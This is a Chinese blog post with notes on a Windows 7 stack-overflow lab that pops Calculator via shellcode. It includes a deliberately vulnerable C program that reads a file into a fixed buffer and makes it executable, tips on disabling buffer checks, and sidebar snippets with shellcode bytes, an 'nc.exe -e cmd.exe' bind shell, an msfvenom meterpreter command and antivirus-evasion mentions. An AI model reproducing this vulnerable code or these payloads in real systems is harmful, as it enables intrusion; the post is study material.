win7下模拟溢出漏洞利用shellcode弹出计算器

最新推荐文章于 2022-05-27 18:12:39 发布
最新推荐文章于 2022-05-27 18:12:39 发布
阅读量3.2k 收藏 5
点赞数 1
分类专栏: 漏洞 文章标签: 漏洞 win7 溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sbc1232123321/article/details/78168569
版权

详细步骤见

http://blog.csdn.net/rectsuly/article/details/70179755

这里只是几点补充

1、win7有内存保护需要在程序里调用VirtualProtect方法,将内存改为可以执行,如下:

#include "stdio.h"
#include "stdlib.h"
#include "string.h"

int main() {

    char name[512];
    printf("Reading name from file...\n");
    FILE *f = fopen("c:\\Users\\Administrator\\Desktop\\tmp\\name.dat", "rb");
    if (!f)
        return -1;
    fseek(f, 0L, SEEK_END);
    long bytes = ftell(f);
    fseek(f, 0L, SEEK_SET);

    fread(name, 1, bytes, f); 
    name[bytes] = '\0';
    fclose(f);

    printf("Hi, %s!\n", name);

    DWORD dwOld=0;
    VirtualProtect(name,516,PAGE_EXECUTE_READWRITE,&dwOld);

    system("pause");

    return 0;
}

2、用vs编写漏洞程序时最好把一些东西给关了:
项目-属性-C/C++-代码生成-缓冲区安全检查设为否

3、name.dat的生成的话 ret_eip 自己找,其他的直接按文中写的就行,本人开od时每次都是sub esp,24C 而不是 sub esp,200 ,导致计算fillbytes长度错误,最后od debug发现跳错位置了 0_0 。后来觉得应该是一些局部变量多占了一些空间。

这里写图片描述

sinaposb
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Win 7下定位kernel32.dll基址及shellcode编写1
08-03
利用 PEB 结构来查找 kernel32.dll 的原理:FS 段寄存器作为选择子指向当前的 TEB 结构,在位于 PEB_LDR_DATA 结构偏移 0x1
dll劫持payload.dll弹出计算器
03-18
dll劫持payload.dll弹出计算器
overflow-vulnerability-exploit:此Shellcode旨在利用Windows上的溢出漏洞来执行远程代码
05-01
溢出漏洞利用Shellcode旨在利用Windows上的溢出漏洞来执行远程代码 我的shellcode执行以下任务:1.使用进程环境块(PEB)查找kernel32.dll地址。 由于我们可以在fs:[0x30]处找到PEB地址,并且kernel32.dll始终是要初始化的第二个模块,因此我们可以使用此知识来查找kernel32.dll的基地址。 2.接下来,我的shellcode将使用“导出目录表(EDT)”来查找所需功能的相对虚拟地址。 据我所需要的函数的函数名称哈希值所知,我可以在EDT中找到它们的RVA。 使用kernel32.dll的基地址,我们可以获得所需功能的绝对地址。 最后,当我知道将要使用的函数的地址时,我可以使用参数运行这些函数以实施我的漏洞利用。 在我的shellcode中,我使用CreateProcessA函数运行“ nc.exe -e cmd.exe -l
内存漏出漏洞的实现方法
11-10
内存漏出漏洞教程
python内存溢出漏洞的实现方法
11-10
python缓冲区溢出攻击shellcode.zip
win7下测试shellcode的方法1:关闭DEP
02-22 176
win7下,通过下面的方法测试shellcode: char shellcode [] ="..." ; int main ( int argc , char ** argv) { __asm { lea eax , shellcode call eax } ...
msf shellcode分离免杀技术
yy
05-27 1869
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
WinXP/Win7/Win8通用shellcode
SauceJ的专栏
09-17 1314
转自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 众所周知,在windows xp时代未启用ASLR(Address space layout randomization,堆栈地址随机分布),我们在编写shellcode可以利用硬编码法,将地址写入shellcode,但是这种方法的缺点很明显--不具备通用性。在xp sp
WIN7下可执行的ShellCode
小神兵之技术篇
01-16 4286
#include #include int main() { byte shellcode[] = { 0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x
winxp、win2003、win7、win8通用的shellcode
冷风
06-16 6536
此代码在vc6下直接编译,提取shellcode时进行debug模式,打开内存窗口,复制出二进制代码,整理成shellcode就可以了
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件
05-06
弹出DOS窗口的缓冲区溢出shellcode源代码及可执行文件,有两个不同的程序代码
Win 7下定位kernel32.dll基址及shellcode编写
wgdguodong2008的专栏
06-18 684
标 题: Win 7下定位kernel32.dll基址及shellcode编写 作 者: Cryin 时 间: 2010-10-14,22:19:43 链 接: http://bbs.pediy.com/showthread.php?t=122260 Win 7下定位kernel32.dll基址及shellcode编写 Author:Cryin Data:2010.10.14 B
win7运行linux程序,WIN7下可执行的ShellCode
weixin_42356460的博客
05-01 122
#include #include int main(){byte shellcode[] = {0xE9, 0x96, 0x00, 0x00, 0x00, 0x56, 0x31, 0xC9, 0x64, 0x8B, 0x71, 0x30, 0x8B, 0x76, 0x0C, 0x8B,0x76, 0x1C, 0x8B, 0x46, 0x08, 0x8B, 0x7E, 0x20, 0x8B, 0x...
使用MSF生成的shellcode打造免杀payload
MickeyMouse1928的博客
05-04 1万+
环境: 1.Kali攻击机IP:192.168.114.140 2.使用win7生成exe 步骤: 使用msfvenom生成shellcode : msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台
Windows Shellcode开发[2]
weixin_41487541的博客
03-24 4412
0 前言 在这部分我们将了解正确编写Windows系统shellcode所需的信息:进程环境块和PE文件格式。上一部分在这里:Windows Shellcode开发[1] 1 进程环境块 在Windows操作系统中,PEB作为一种结构可以用于内存中固定地址的每个进程。此结构包含进程相关信息,如:可执行文件加载到内存中的地址、模块列表(DLL)、指定进程是否在调试等。在不同版本的Windows系统中,PEB各字段偏移可能会随之改变。 由于地址空间布局随机化(ASLR),DLL将被加载到不同的内存地址,
shellcode——1、采用硬编码弹出计算器
alwin_cx的博客
05-19 6242
一、shellcode介绍    用一句话给shellcode下个定义,那就是“一段可以执行特定功能的机器码”。二、实验环境及工具介绍实验环境:Windows XP SP3实验工具:OllyDbg、WinHex、LordPE三、编程思路     用C语言来描述其实就是两句:WinExec("calc.exe", 5); ExitProcess(0);     看到有些文章会在开头还加一句:Load...
所有windows可用shellcode
osummertime的博客
04-12 1993
引用#include "stdafx.h" #include <windows.h> #include<Tlhelp32.h> unsigned char shellcode[] = "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" "\xB1\x18\x33\xFF\x33\x
windows下shellcode编写入门
热门推荐
x_nirvana的博客
03-31 1万+
本文简要介绍shellcode开发技术及其特点。理解这些概念可以有助于我们编写自己的shellcode。更进一步讲,你可以修改现有的漏洞利用代码来执行自己所需要的定制功能。
Windows线程注入——弹窗ShellCode
sandikast的专栏
01-16 2083
进行程序线程注入的代码,执行一个弹窗的ShellCode。在Win7 64位之前可以完美运行,但是Win7 64位下插入的代码因为安全机制的原因无法执行,会报错! #include #include #include typedef struct _THREAD_PARA { FARPROC pFunc[2]; }THREAD_PARAM, *PTHREAD_PARAM; BY
shellcode计算器
最新发布
09-08
shellcode计算器是一种恶意代码,用于利用计算机系统中的漏洞,并在系统中执行特定的操作。引用中提到的样本是一种shellcode,它的原理是通过加载MSVCRT.DLL库,然后使用system()函数调用calc命令,从而打开计算器应用程序。然而,引用中指出,该shellcode脚本只在Windows XP系统下适用,且其中的函数地址采用的是固定地址,不适用于Windows 7及以上版本的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值